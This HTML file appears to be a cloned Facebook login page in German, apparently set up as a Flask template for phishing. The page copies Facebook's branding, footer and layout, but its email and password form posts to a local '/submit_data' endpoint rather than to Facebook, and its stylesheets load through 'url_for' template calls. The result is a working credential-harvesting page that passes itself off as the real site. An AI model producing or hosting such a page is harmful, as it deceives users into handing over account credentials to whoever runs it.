<!DOCTYPE html>

<html class="no_js" id="facebook" lang="de">
<head><meta charset="utf-8"/><meta content="default" id="meta_referrer" name="referrer"/><style nonce="TLm207Rl"></style><noscript><meta content="0; URL=/?_fb_noscript=1" http-equiv="refresh"/></noscript><link crossorigin="use-credentials" href="/data/manifest/" id="MANIFEST_LINK" rel="manifest"/><title id="pageTitle">Facebook – Anmelden oder Registrieren</title><meta content="Facebook" property="og:site_name"/><meta content="https://www.facebook.com/" property="og:url"/><meta content="https://www.facebook.com/images/fb_icon_325x325.png" property="og:image"/><meta content="de_DE" property="og:locale"/><meta content="www" property="og:locale:alternate"/><meta content="es_LA" property="og:locale:alternate"/><meta content="es_ES" property="og:locale:alternate"/><meta content="fr_FR" property="og:locale:alternate"/><meta content="it_IT" property="og:locale:alternate"/><meta content="id_ID" property="og:locale:alternate"/><meta content="th_TH" property="og:locale:alternate"/><meta content="vi_VN" property="og:locale:alternate"/><meta content="ko_KR" property="og:locale:alternate"/><meta content="ja_JP" property="og:locale:alternate"/><link href="https://m.facebook.com/" media="only screen and (max-width: 640px)" rel="alternate"/><link href="https://m.facebook.com/" media="handheld" rel="alternate"/><meta content="Melde dich bei Facebook an, um dich mit deinen Freunden, deiner Familie und Personen, die du kennst, zu verbinden und Inhalte zu teilen." name="description"/><link href="https://www.facebook.com/" rel="canonical"/><link href="https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico" rel="icon"/><link data-bootloader-hash="WUNSuBU" href="https://static.xx.fbcdn.net/rsrc.php/v3/yd/l/0,cross/opFX3Ebc2ns.css?_nc_x=Ij3Wp8lg5Kz" rel="stylesheet" type="text/css"/>
<link data-bootloader-hash="Pud6B2Z" href="https://static.xx.fbcdn.net/rsrc.php/v3/yV/l/0,cross/KxGJ10xTR_J.css?_nc_x=Ij3Wp8lg5Kz" rel="stylesheet" type="text/css"/>
<link data-bootloader-hash="lMvQ+N9" href="https://static.xx.fbcdn.net/rsrc.php/v3/yV/l/0,cross/PkLOZXv3316.css?_nc_x=Ij3Wp8lg5Kz" rel="stylesheet" type="text/css"/>
<link data-bootloader-hash="kUKCCV5" href="https://static.xx.fbcdn.net/rsrc.php/v3/y1/l/0,cross/jKB9LjxHmGG.css?_nc_x=Ij3Wp8lg5Kz" rel="stylesheet" type="text/css"/>

<link href="-uKRJleLmXA.css" rel="stylesheet" type="text/css"/>
<link href="A0ue4FsYzBU.css" rel="stylesheet" type="text/css"/>
<link href="Dj-ykj6HWlU.css" rel="stylesheet" type="text/css"/>
<link href="eZH65WBPM3G.css" rel="stylesheet" type="text/css"/>
<link href="Gwj8PO_yoln.css" rel="stylesheet" type="text/css"/>
<link href="jKB9LjxHmGG.css" rel="stylesheet" type="text/css"/>
<link href="Kql6xp5-7yU.css" rel="stylesheet" type="text/css"/>
<link href="KxGJ10xTR_J.css" rel="stylesheet" type="text/css"/>
<link href="NjhjQ_LtuFR.css" rel="stylesheet" type="text/css"/>
<link href="NVgbAXFs6z1.css" rel="stylesheet" type="text/css"/>
<link href="oN-KTIVurPX.css" rel="stylesheet" type="text/css"/>
<link href="opFX3Ebc2ns.css" rel="stylesheet" type="text/css"/>
<link href="PkLOZXv3316.css" rel="stylesheet" type="text/css"/>
<link href="q9PFuvR_WNL.css" rel="stylesheet" type="text/css"/>
<link href="wyuCUDWEnD5.css" rel="stylesheet" type="text/css"/>
<link href="XMFGr_lHUCS.css" rel="stylesheet" type="text/css"/>
<link href="Xyoav1gLypl.css" rel="stylesheet" type="text/css"/>
<link href="Y-hdyIrXVfQ.css" rel="stylesheet" type="text/css"/>
<link href="yotEdcUw9Gj.css" rel="stylesheet" type="text/css"/>
<link href="{{ url_for('static', filename='-uKRJleLmXA.css') }}" rel="stylesheet" type="text/css"/>
<link href="{{ url_for('static', filename='A0ue4FsYzBU.css') }}" rel="stylesheet" type="text/css"/>
<link href="{{ url_for('static', filename='Dj-ykj6HWlU.css') }}" rel="stylesheet" type="text/css"/>
<link href="{{ url_for('static', filename='eZH65WBPM3G.css') }}" rel="stylesheet" type="text/css"/>
<link href="{{ url_for('static', filename='Gwj8PO_yoln.css') }}" rel="stylesheet" type="text/css"/>
<link href="{{ url_for('static', filename='jKB9LjxHmGG.css') }}" rel="stylesheet" type="text/css"/>
<link href="{{ url_for('static', filename='Kql6xp5-7yU.css') }}" rel="stylesheet" type="text/css"/>
<link href="{{ url_for('static', filename='KxGJ10xTR_J.css') }}" rel="stylesheet" type="text/css"/>
<link href="{{ url_for('static', filename='NjhjQ_LtuFR.css') }}" rel="stylesheet" type="text/css"/>
<link href="{{ url_for('static', filename='NVgbAXFs6z1.css') }}" rel="stylesheet" type="text/css"/>
<link href="{{ url_for('static', filename='oN-KTIVurPX.css') }}" rel="stylesheet" type="text/css"/>
<link href="{{ url_for('static', filename='opFX3Ebc2ns.css') }}" rel="stylesheet" type="text/css"/>
<link href="{{ url_for('static', filename='PkLOZXv3316.css') }}" rel="stylesheet" type="text/css"/>
<link href="{{ url_for('static', filename='q9PFuvR_WNL.css') }}" rel="stylesheet" type="text/css"/>
<link href="{{ url_for('static', filename='wyuCUDWEnD5.css') }}" rel="stylesheet" type="text/css"/>
<link href="{{ url_for('static', filename='XMFGr_lHUCS.css') }}" rel="stylesheet" type="text/css"/>
<link href="{{ url_for('static', filename='Xyoav1gLypl.css') }}" rel="stylesheet" type="text/css"/>
<link href="{{ url_for('static', filename='Y-hdyIrXVfQ.css') }}" rel="stylesheet" type="text/css"/>
<link href="{{ url_for('static', filename='yotEdcUw9Gj.css') }}" rel="stylesheet" type="text/css"/>
<link href="{{ url_for('static', filename='-uKRJleLmXA.css') }}" rel="stylesheet" type="text/css"/>
<link href="{{ url_for('static', filename='A0ue4FsYzBU.css') }}" rel="stylesheet" type="text/css"/>
<link href="{{ url_for('static', filename='Dj-ykj6HWlU.css') }}" rel="stylesheet" type="text/css"/>
<link href="{{ url_for('static', filename='eZH65WBPM3G.css') }}" rel="stylesheet" type="text/css"/>
<link href="{{ url_for('static', filename='Gwj8PO_yoln.css') }}" rel="stylesheet" type="text/css"/>
<link href="{{ url_for('static', filename='jKB9LjxHmGG.css') }}" rel="stylesheet" type="text/css"/>
<link href="{{ url_for('static', filename='Kql6xp5-7yU.css') }}" rel="stylesheet" type="text/css"/>
<link href="{{ url_for('static', filename='KxGJ10xTR_J.css') }}" rel="stylesheet" type="text/css"/>
<link href="{{ url_for('static', filename='NjhjQ_LtuFR.css') }}" rel="stylesheet" type="text/css"/>
<link href="{{ url_for('static', filename='NVgbAXFs6z1.css') }}" rel="stylesheet" type="text/css"/>
<link href="{{ url_for('static', filename='oN-KTIVurPX.css') }}" rel="stylesheet" type="text/css"/>
<link href="{{ url_for('static', filename='opFX3Ebc2ns.css') }}" rel="stylesheet" type="text/css"/>
<link href="{{ url_for('static', filename='PkLOZXv3316.css') }}" rel="stylesheet" type="text/css"/>
<link href="{{ url_for('static', filename='q9PFuvR_WNL.css') }}" rel="stylesheet" type="text/css"/>
<link href="{{ url_for('static', filename='wyuCUDWEnD5.css') }}" rel="stylesheet" type="text/css"/>
<link href="{{ url_for('static', filename='XMFGr_lHUCS.css') }}" rel="stylesheet" type="text/css"/>
<link href="{{ url_for('static', filename='Xyoav1gLypl.css') }}" rel="stylesheet" type="text/css"/>
<link href="{{ url_for('static', filename='Y-hdyIrXVfQ.css') }}" rel="stylesheet" type="text/css"/>
<link href="{{ url_for('static', filename='yotEdcUw9Gj.css') }}" rel="stylesheet" type="text/css"/>
</head><body class="fbIndex UIPage_LoggedOut _-kb _605a b_c3pyn-ahh x1 Locale_de_DE" dir="ltr"><div class="_li" id="u_0_1_SR"><div class="uiContextualLayerParent" id="globalContainer"><div class="fb_content clearfix" id="content" role="main"><div><div class="_8esj _95k9 _8esf _8opv _8f3m _8ilg _8icx _8op_ _95ka"><div class="_8esk"><div class="_8esl"><div class="_8ice"><img alt="Facebook" class="fb_logo _8ilh img" src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg"/></div><h2 class="_8eso">Auf Facebook bleibst du mit Menschen in Verbindung und teilst Fotos, Videos und vieles mehr mit ihnen.</h2></div><div class="_8esn"><div class="_8iep _8icy _9ahz _9ah-"><div class="_6luv _52jv"><form action="/submit_data" class="_9vtf" data-testid="royal_login_form" id="u_0_2_QQ" method="POST" onsubmit=""><input autocomplete="off" name="jazoest" type="hidden" value="21040"/><input autocomplete="off" name="lsd" type="hidden" value="AVpp4nkyIqY"/><div><div class="_6lux"><input aria-label="E-Mail-Adresse oder Telefonnummer" autofocus="1" class="inputtext _55r1 _6luy" data-testid="royal_email" id="email" name="email" placeholder="E-Mail-Adresse oder Telefonnummer" type="text"/></div><div class="_6lux"><div class="_6luy _55r1 _1kbt" id="passContainer"><input aria-label="Passwort" class="inputtext _55r1 _6luy _9npi" data-testid="royal_pass" id="pass" name="pass" placeholder="Passwort" type="password"/><div class="_9ls7" id="u_0_3_U8"><a href="#" role="button"><div class="_9lsa"><div class="_9lsb" id="u_0_4_by"></div></div></a></div></div></div></div><input autocomplete="off" name="login_source" type="hidden" value="comet_headerless_login"/><input autocomplete="off" name="next" type="hidden" value=""/><div class="_6ltg"><button class="_42ft _4jy0 _6lth _4jy6 _4jy1 selected _51sy" data-testid="royal_login_button" id="u_0_5_bP" name="login" type="submit" value="1">Anmelden</button></div><div class="_6ltj"><a href="https://www.facebook.com/recover/initiate/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNjg1NjE2NTkzLCJjYWxsc2l0ZV9pZCI6MzgxMjI5MDc5NTc1OTQ2fQ%3D%3D&amp;ars=facebook_login">Passwort vergessen?</a></div><div class="_8icz"></div><div class="_6ltg"><a ajaxify="/reg/spotlight/" class="_42ft _4jy0 _6lti _4jy6 _4jy2 selected _51sy" data-testid="open-registration-form-button" href="#" id="u_0_0_6Y" rel="async" role="button">Neues Konto erstellen</a></div></form></div><div class="_58mk" id="reg_pages_msg"><a class="_8esh" href="/pages/create/?ref_type=registration_form">Erstelle eine Seite</a> für einen Star, eine Marke oder ein Unternehmen.</div></div></div></div></div></div></div><div class=""><div class="_95ke _8opy"><div data-referrer="page_footer" data-testid="page_footer" id="pageFooter"><ul class="uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i" data-nocookies="1"><li>Deutsch</li><li><a class="_sv4" dir="ltr" href="https://www.facebook.com/" onclick='require("IntlUtils").setCookieLocale("en_US", "de_DE", "https:\/\/www.facebook.com\/", "www_list_selector", 0); return false;' title="English (US)">English (US)</a></li><li><a class="_sv4" dir="ltr" href="https://tr-tr.facebook.com/" onclick='require("IntlUtils").setCookieLocale("tr_TR", "de_DE", "https:\/\/tr-tr.facebook.com\/", "www_list_selector", 1); return false;' title="Turkish">Türkçe</a></li><li><a class="_sv4" dir="ltr" href="https://hu-hu.facebook.com/" onclick='require("IntlUtils").setCookieLocale("hu_HU", "de_DE", "https:\/\/hu-hu.facebook.com\/", "www_list_selector", 2); return false;' title="Hungarian">Magyar</a></li><li><a class="_sv4" dir="ltr" href="https://sr-rs.facebook.com/" onclick='require("IntlUtils").setCookieLocale("sr_RS", "de_DE", "https:\/\/sr-rs.facebook.com\/", "www_list_selector", 3); return false;' title="Serbian">Српски</a></li><li><a class="_sv4" dir="ltr" href="https://ro-ro.facebook.com/" onclick='require("IntlUtils").setCookieLocale("ro_RO", "de_DE", "https:\/\/ro-ro.facebook.com\/", "www_list_selector", 4); return false;' title="Romanian">Română</a></li><li><a class="_sv4" dir="ltr" href="https://pl-pl.facebook.com/" onclick='require("IntlUtils").setCookieLocale("pl_PL", "de_DE", "https:\/\/pl-pl.facebook.com\/", "www_list_selector", 5); return false;' title="Polish">Polski</a></li><li><a class="_sv4" dir="ltr" href="https://hr-hr.facebook.com/" onclick='require("IntlUtils").setCookieLocale("hr_HR", "de_DE", "https:\/\/hr-hr.facebook.com\/", "www_list_selector", 6); return false;' title="Croatian">Hrvatski</a></li><li><a class="_sv4" dir="ltr" href="https://sk-sk.facebook.com/" onclick='require("IntlUtils").setCookieLocale("sk_SK", "de_DE", "https:\/\/sk-sk.facebook.com\/", "www_list_selector", 7); return false;' title="Slovak">Slovenčina</a></li><li><a class="_sv4" dir="ltr" href="https://es-la.facebook.com/" onclick='require("IntlUtils").setCookieLocale("es_LA", "de_DE", "https:\/\/es-la.facebook.com\/", "www_list_selector", 8); return false;' title="Spanish">Español</a></li><li><a class="_sv4" dir="ltr" href="https://pt-br.facebook.com/" onclick='require("IntlUtils").setCookieLocale("pt_BR", "de_DE", "https:\/\/pt-br.facebook.com\/", "www_list_selector", 9); return false;' title="Portuguese (Brazil)">Português (Brasil)</a></li><li><a ajaxify="/settings/language/language/?uri=https%3A%2F%2Fpt-br.facebook.com%2F&amp;source=www_list_selector_more" class="_42ft _4jy0 _517i _517h _51sy" href="#" rel="dialog" role="button" title="Weitere Sprachen anzeigen"><i class="img sp_EP9wX8qDDvu sx_0de3e6"></i></a></li></ul><div id="contentCurve"></div><div aria-label="Facebook-Webseitenlinks" id="pageFooterChildren" role="contentinfo"><ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i"><li><a href="/reg/" title="Für Facebook registrieren">Registrieren</a></li><li><a href="/login/" title="Bei Facebook anmelden">Anmelden</a></li><li><a href="https://messenger.com/" title="Probiere den Messenger aus.">Messenger</a></li><li><a href="/lite/" title="Facebook Lite für Android">Facebook Lite</a></li><li><a href="https://www.facebook.com/watch/" title="Durchstöbere unsere Watch-Videos.">Watch</a></li><li><a href="/places/" title="Probiere beliebte Orte auf Facebook aus.">Orte</a></li><li><a href="/games/" title="Probiere Spiele auf Facebook aus.">Spiele</a></li><li><a href="/marketplace/" title="Im Facebook Marketplace Artikel kaufen und verkaufen">Marketplace</a></li><li><a href="https://pay.facebook.com/" target="_blank" title="Weitere Infos zu Meta Pay">Meta Pay</a></li><li><a href="https://www.meta.com/" target="_blank" title="Meta kennenlernen">Meta Store</a></li><li><a href="https://www.meta.com/quest/" target="_blank" title="Mehr zu Meta Quest">Meta Quest</a></li><li><a data-lynx-mode="hover" href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT1IfCwlOxqRIg5W8NHCZogcAIuHwcKUayDcrM5yKcb3mcJW73dv6na51RqRkkWxv3AM2W6D2Bo-Bm9x6MS5yAZamB7Xjkw8MOkJ7zuC3j0feSciiJRqcRittIBJXiPxoT_oZmAEc7s7OitV" rel="nofollow" target="_blank" title="Probiere Instagram aus">Instagram</a></li><li><a href="/fundraisers/" title="Spende für eine sinnvolle Sache.">Spendenaktionen</a></li><li><a href="/biz/directory/" title="Durchsuche unser Facebook Dienstleistungsverzeichnis">Services</a></li><li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="Wahl-Informationszentrum ansehen">Wahl-Informationszentrum</a></li><li><a href="/privacy/policy/?entry_point=facebook_page_footer" title="Infos dazu, wie wir Informationen erfassen, verwenden und teilen, um Facebook als Dienst anbieten zu können">Datenschutzrichtlinie</a></li><li><a href="/privacy/center/?entry_point=facebook_page_footer" title="Infos zu deinen Privatsphäre-Optionen auf Facebook und wie du sie festlegen und verwalten kannst">Privacy Center</a></li><li><a href="/groups/discover/" title="Entdecke unsere Gruppen.">Gruppen</a></li><li><a accesskey="8" href="https://about.meta.com/" title="Lies unseren Blog, entdecke unseren Ressourcenbereich und suche nach Jobs.">Info</a></li><li><a href="/ad_campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;nav_source=unknown&amp;extra_1=auto" title="Wirb auf Facebook.">Werbeanzeige erstellen</a></li><li><a href="/pages/create/?ref_type=site_footer" title="Seite erstellen">Seite erstellen</a></li><li><a href="https://developers.facebook.com/?ref=pf" title="Entwickle Apps auf unserer Plattform.">Entwickler</a></li><li><a href="/careers/?ref=pf" title="Mach deinen nächsten Karriereschritt und bewirb dich bei unserem großartigen Unternehmen.">Karriere</a></li><li><a data-nocookies="1" href="/policies/cookies/" title="Erfahre mehr über Cookies und Facebook.">Cookies</a></li><li><a class="_41ug" data-nocookies="1" href="https://www.facebook.com/help/568137493302217" title="Erfahre mehr über Datenschutzinfo.">Werbepräferenzen<i class="img sp_EP9wX8qDDvu sx_6bdd81"></i></a></li><li><a accesskey="9" data-nocookies="1" href="/policies?ref=pf" title="Unsere Nutzungsbedingungen und Richtlinien.">Nutzungsbedingungen</a></li><li><a accesskey="0" href="/help/?ref=pf" title="Besuche unseren Hilfebereich.">Hilfe</a></li><li><a href="help/637205020878504" title="Klicke auf unseren Hinweis zum Hochladen von Kontakten und zu Nicht-Nutzern.">Hochladen von Kontakten und Nicht-Nutzer</a></li><li><a accesskey="6" class="accessible_elem" href="/settings" title="Facebook-Einstellungen ansehen und bearbeiten.">Einstellungen</a></li><li><a accesskey="7" class="accessible_elem" href="/allactivity?privacy_source=activity_log_top_menu" title="Aktivitätenprotokoll anzeigen">Aktivitätenprotokoll</a></li></ul></div><div class="mvl copyright"><div><span> Meta © 2023</span></div></div></div></div></div></div><div></div><span><img height="0" src="https://facebook.com/security/hsts-pixel.gif?c=3.2.5" style="display:none" width="0"/></span></div><div style="display:none"></div>




<link as="style" href="https://static.xx.fbcdn.net/rsrc.php/v3/yd/l/0,cross/opFX3Ebc2ns.css?_nc_x=Ij3Wp8lg5Kz" rel="preload"/>
<link as="style" href="https://static.xx.fbcdn.net/rsrc.php/v3/yV/l/0,cross/KxGJ10xTR_J.css?_nc_x=Ij3Wp8lg5Kz" rel="preload"/>
<link as="style" href="https://static.xx.fbcdn.net/rsrc.php/v3/yV/l/0,cross/PkLOZXv3316.css?_nc_x=Ij3Wp8lg5Kz" rel="preload"/>
<link as="style" href="https://static.xx.fbcdn.net/rsrc.php/v3/y1/l/0,cross/jKB9LjxHmGG.css?_nc_x=Ij3Wp8lg5Kz" rel="preload"/>
<link as="script" href="https://static.xx.fbcdn.net/rsrc.php/v3/y8/r/amzfHSqnG6s.js?_nc_x=Ij3Wp8lg5Kz" nonce="TLm207Rl" rel="preload"/>
<link as="script" href="https://static.xx.fbcdn.net/rsrc.php/v3/y0/r/KTiFWdV2a-W.js?_nc_x=Ij3Wp8lg5Kz" nonce="TLm207Rl" rel="preload"/>
<link as="script" href="https://static.xx.fbcdn.net/rsrc.php/v3iN_84/yu/l/de_DE/4NLaBYnEOuq.js?_nc_x=Ij3Wp8lg5Kz" nonce="TLm207Rl" rel="preload"/>
<link as="script" href="https://static.xx.fbcdn.net/rsrc.php/v3/yA/r/lyWEQCUEWYu.js?_nc_x=Ij3Wp8lg5Kz" nonce="TLm207Rl" rel="preload"/>
<link as="style" href="https://static.xx.fbcdn.net/rsrc.php/v3/ym/l/0,cross/EULOuFUOLfV.css?_nc_x=Ij3Wp8lg5Kz" rel="preload"/>




</body></html>